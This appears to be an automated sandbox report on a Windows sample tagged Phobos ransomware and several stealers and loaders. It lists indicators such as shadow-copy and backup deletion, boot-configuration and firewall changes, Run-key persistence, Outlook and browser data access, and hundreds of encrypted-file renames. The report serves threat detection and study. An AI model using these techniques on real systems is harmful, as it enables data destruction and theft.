Malware Analysis Report

2024-11-16 12:17

Sample ID 230713-y6mggsba78
Target caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87
SHA256 caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87
Tags
phobos rhadamanthys smokeloader systembc backdoor collection evasion persistence ransomware spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87

Threat Level: Known bad

The file caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87 was found to be: Known bad.

Malicious Activity Summary

phobos rhadamanthys smokeloader systembc backdoor collection evasion persistence ransomware spyware stealer trojan upx

SystemBC

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect rhadamanthys stealer shellcode

Phobos

SmokeLoader

Renames multiple (472) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Downloads MZ/PE file

Modifies Windows Firewall

Deletes backup catalog

UPX packed file

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Kills process with taskkill

outlook_win_path

Runs net.exe

outlook_office_path

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Enumerates processes with tasklist

Checks processor information in registry

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

GoLang User-Agent

Gathers system information

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-13 20:23

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-13 20:23

Reported

2023-07-13 20:26

Platform

win10v2004-20230703-en

Max time kernel

110s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2256 created 2572 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\Explorer.EXE

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (472) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\o{qOsfR.exe C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\o{qOsfR = "C:\\Users\\Admin\\AppData\\Local\\o{qOsfR.exe" C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\o{qOsfR = "C:\\Users\\Admin\\AppData\\Local\\o{qOsfR.exe" C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1043950675-1972537973-2972532878-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1043950675-1972537973-2972532878-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4464 set thread context of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-pl.xrm-ms.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\tt.pak.DATA.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Client\vcruntime140.dll.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_bg.dll C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\MapDarkTheme.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_3.m4a C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-string-l1-1-0.dll C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolap.dll.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\ThinAppXManifest.xml.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-125.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_TileLargeSquare.scale-200.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\AttachmentPlaceholder-Light.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\BadgeLogo.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-100.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\el.pak.DATA C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.V7.dll C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\ui-strings.js.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\PackageManagementDscUtilities.psm1 C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-256_contrast-black.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Cyrl-BA.pak.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sybase.xsl.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\MedTile.scale-100.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\selector.js.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-125.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\ui-strings.js.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\7-Zip\Lang\pl.txt.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-140.png.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_altform-lightunplated.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ar.pak C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.lv-lv.dll.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\demux\librawaud_plugin.dll.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WideTile.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG.id[49C07676-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\contacts_permission_ios.gif C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
